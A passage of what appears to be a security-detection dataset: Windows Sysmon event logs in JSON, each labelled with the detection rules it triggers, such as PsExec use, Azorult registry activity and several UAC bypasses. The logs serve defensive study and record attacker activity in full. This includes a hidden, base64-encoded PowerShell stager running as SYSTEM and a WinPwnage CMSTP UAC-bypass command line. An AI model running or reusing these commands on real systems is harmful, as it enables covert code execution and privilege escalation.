IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-2586-5CC9-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"powershell.exe -nop -w hidden -noni -c \"if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);\"","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AF8B-5CC8-0000-0010AC1B1900","ParentProcessId":3872,"ProcessGuid":"365ABB72-AF8C-5CC8-0000-001003361900","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-30 20:26:52.356"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9809,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:52.356089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-2586-5CC9-0000-0010DC530000","ProcessId":460,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\hello\\Start","UtcTime":"2019-04-30 20:26:53.168"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":9812,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:26:53.199839Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Tool Execution"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-08-27 11:40:56.396","Image":"System","ProcessGuid":"B5CF5917-721E-5F46-0000-0010EB030000","ProcessId":4,"RuleName":"","TargetFilename":"C:\\Windows\\PSEXESVC.exe","UtcTime":"2020-08-27 11:40:56.396"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":11,"EventRecordID":263572,"Execution_attributes":{"ProcessID":2580,"ThreadID":4144},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-08-27T11:40:56.397086Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Service Start"],"event":{"Event":{"EventData":{"CommandLine":"C:\\WINDOWS\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\WINDOWS\\system32\\","Description":"PsExec Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"B5CF5917-7237-5F46-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\WINDOWS\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"B5CF5917-7236-5F46-0000-001058880000","ParentProcessId":632,"ProcessGuid":"B5CF5917-9BC8-5F47-0000-001042AB2001","ProcessId":4320,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-08-27 11:40:56.610"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"04246w-win10.threebeesco.com","Correlation":null,"EventID":1,"EventRecordID":263573,"Execution_attributes":{"ProcessID":2580,"ThreadID":4144},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-08-27T11:40:56.625194Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-0B9E-5D1D-0000-00100BF40D00","ProcessId":3844,"RuleName":"Lateral Movement - New Named Pipe added to NullSession","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\LanmanServer\\Parameters\\NullSessionPipes","UtcTime":"2019-07-03 20:10:06.459"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8228,"Execution_attributes":{"ProcessID":112,"ThreadID":2084},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-03T20:10:06.475561Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\users\\ieuser\\appdata\\local\\temp","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Volatile Environment\\SYSTEMROOT","UtcTime":"2019-05-10 12:21:57.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15635,"Execution_attributes":{"ProcessID":2016,"ThreadID":2012},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-10T12:21:57.286666Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-10 12:06:06.896","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\system32\\mmc.exe","UtcTime":"2019-05-10 12:22:02.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15636,"Execution_attributes":{"ProcessID":2016,"ThreadID":2012},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-10T12:22:02.434314Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-08-03 11:23:15.519","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6EA3-5D45-0000-0010204DE100","ProcessId":7984,"RuleName":"PrivEsc - UAC Bypass UACME 30","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wow64log.dll","UtcTime":"2019-08-03 11:23:15.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5401,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-08-03T11:23:15.560614Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\\(Default)","UtcTime":"2019-05-09 03:25:24.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11264,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-09T03:25:24.630445Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\onedrive\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-94CD-5CD3-0000-0020DD3A0100","LogonId":"0x13add","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-9DA4-5CD3-0000-00102E692F00","ParentProcessId":3184,"ProcessGuid":"365ABB72-9DA4-5CD3-0000-00107F7A2F00","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 03:25:24.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11267,"Execution_attributes":{"ProcessID":1988,"ThreadID":228},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-09T03:25:25.067945Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3B92-5EB5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-4640-5EB7-0000-0010EF364B01","ParentProcessId":372,"ProcessGuid":"747F3D96-4647-5EB7-0000-0010B3454B01","ProcessId":7672,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-10 00:09:43.370"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":112972,"Execution_attributes":{"ProcessID":2728,"ThreadID":3432},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-10T00:09:43.372595Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 17:28:17.363","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ProcessId":2460,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp.ini","UtcTime":"2019-05-11 17:28:17.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16037,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:17.363930Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmstp.exe\" /au c:\\users\\ieuser\\appdata\\local\\temp\\tmp.ini","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.02.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7B1FF39621D704665F392CB19171B8337E042D7D,MD5=00263CA2071DC9A6EE577EB356B0D1D9,SHA256=AE11B4CD277731BA5D218A2FDB22D19EA5F2780256BC481E86ACBD8ED4CCF1C4,IMPHASH=152AEE2AB20419D44875B94A2E5E3387","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-F9CD-5CD6-0000-002065370100","LogonId":"0x13765","ParentCommandLine":"python winpwnage.py -u uac -i 17 -p c:\\windows\\System32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ParentProcessId":2460,"ProcessGuid":"365ABB72-0633-5CD7-0000-0010C6A02100","ProcessId":3840,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-11 17:28:19.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16038,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:19.567055Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["CMSTP Execution Registry Event"],"event":{"Event":{"EventData":{"Details":"C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm","EventType":"SetValue","Image":"C:\\Windows\\system32\\DllHost.exe","ProcessGuid":"365ABB72-0545-5CD7-0000-001078371F00","ProcessId":3044,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\ProfileInstallPath","UtcTime":"2019-05-11 17:28:22.488"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":16039,"Execution_attributes":{"ProcessID":2008,"ThreadID":1992},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-11T17:28:22.598305Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3384-5EA5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":596,"ProcessGuid":"747F3D96-B755-5EA4-0000-0010D06E2500","ProcessId":4484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 22:19:01.724"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27334,"Execution_attributes":{"ProcessID":2752,"ThreadID":3576},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-04-25T22:19:02.057201Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Renamed Binary"],"event":{"Event":{"EventData":{"CommandLine":"c:\\Program Files\\vulnsvc\\mmm.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\program.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-B764-5EA4-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"747F3D96-B764-5EA4-0000-00106F550000","ParentProcessId":584,"ProcessGuid":"747F3D96-B766-5EA4-0000-0010E7880100","ProcessId":2856,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - Potential Unquoted Service Exploit","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 